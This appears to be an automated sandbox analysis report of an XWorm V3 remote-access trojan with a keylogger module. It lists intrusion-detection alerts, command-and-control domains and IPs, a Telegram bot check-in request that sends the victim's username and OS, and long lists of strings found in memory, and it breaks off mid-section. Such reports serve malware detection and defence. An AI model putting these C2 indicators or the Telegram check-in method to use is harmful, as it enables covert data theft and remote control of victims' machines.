Source: C:\Users\Public\DeadCodeRootKit.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A09BF5C FindFirstFileExW, 6_2_000002E86A09BF5C
Source: C:\Windows\System32\winlogon.exe Code function: 11_2_00000225DC64BF5C FindFirstFileExW, 11_2_00000225DC64BF5C
Source: C:\Windows\System32\lsass.exe Code function: 12_2_00000202C0AEBF5C FindFirstFileExW, 12_2_00000202C0AEBF5C
Source: C:\Windows\System32\svchost.exe Code function: 14_2_000002A66130BF5C FindFirstFileExW, 14_2_000002A66130BF5C
Source: C:\Windows\System32\dwm.exe Code function: 16_2_000002BAAF21BF5C FindFirstFileExW, 16_2_000002BAAF21BF5C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000026A879CBF5C FindFirstFileExW, 17_2_0000026A879CBF5C
Source: C:\Windows\System32\svchost.exe Code function: 19_2_00000179537ABF5C FindFirstFileExW, 19_2_00000179537ABF5C
Source: C:\Windows\System32\svchost.exe Code function: 20_2_000002295D56BF5C FindFirstFileExW, 20_2_000002295D56BF5C

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49738 -> 147.185.221.21:28600
Source: Network traffic Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49739 -> 149.154.167.220:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\svchost.exe Domain query: updates-full.gl.at.ply.gg
Source: C:\Windows\System32\svchost.exe Domain query: subscribe-bond.gl.at.ply.gg
Source: C:\Windows\System32\svchost.exe Domain query: api.telegram.org
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: subscribe-bond.gl.at.ply.gg
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 147.185.221.21:28600
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 147.185.221.20:60075
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.4:52581 -> 1.1.1.1:53
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A161EDF6F280165B1D298%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: SALSGIVERUS SALSGIVERUS
Source: Joe Sandbox View ASN Name: SALSGIVERUS SALSGIVERUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A161EDF6F280165B1D298%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: subscribe-bond.gl.at.ply.gg
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: updates-full.gl.at.ply.gg
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 13 Oct 2024 17:15:49 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000243F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774915423.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C024B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000000C.00000002.2957284217.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C0200000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000000C.00000002.2949177193.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763357769.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.dr String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000004.00000002.1899586399.0000011113902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1899586399.0000011113AA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839365843.000002DE90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763590382.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774915423.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C024B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763730672.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 0000001A.00000002.2962138490.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: svchost.exe, 00000016.00000002.3001209327.000001845BB84000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.msoftP
Source: powershell.exe, 00000007.00000002.1786234964.000002DE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002901000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1779642673.0000011103891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1786234964.000002DE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000000C.00000002.2949177193.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763357769.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000007.00000002.1786234964.000002DE80229000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000000C.00000002.2974624894.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774441153.00000202C0402000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 0000000C.00000000.1774122233.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1774122233.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.2189100927.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2969201803.00000202C03B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000003.1786428389.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2967895483.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0~
Source: svchost.exe, 00000028.00000002.3011157363.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1926814755.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msftconnecttest.com
Source: svchost.exe, 00000028.00000002.3011157363.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1926814755.000001AABFC8F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msftconnecttest.com/
Source: powershell.exe, 00000004.00000002.1779642673.0000011103891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1786234964.000002DE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.dr String found in binary or memory: https://api.telegram.org/bot
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%
Source: powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1779642673.0000011104DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1899586399.0000011113902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839365843.000002DE90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.25.dr String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: DeadROOTkit.exe.0.dr, XLogger.cs .Net Code: KeyboardLayout
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: DeadROOTkit.exe.2.dr, XLogger.cs .Net Code: KeyboardLayout
Creates a window with clipboard capturing capabilities
